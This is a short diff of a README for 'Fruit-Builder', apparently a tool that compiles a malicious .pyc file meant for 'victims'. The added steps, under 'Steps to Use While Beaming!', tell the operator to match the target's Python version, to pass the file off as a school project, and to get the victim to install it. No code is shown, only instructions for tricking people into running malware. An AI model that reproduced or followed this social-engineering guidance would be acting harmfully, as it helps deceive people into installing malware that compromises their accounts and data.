ShadowStorm1218/Fruit-Builder/README.md

 9. Press the Compile button
 10. Rename the temp.cpython file to whatever you want.

+# Steps to Use While Beaming!

+1. The user must have the same version of python you have.
+I reccomend using python 3.9 https://www.python.org/downloads/release/python-390/
+2. Say its a school project or something.
+3. Have them install the file :D

 # Why Use Fruit Builder

 1. It install all the dependencies inside of the .pyc file for victims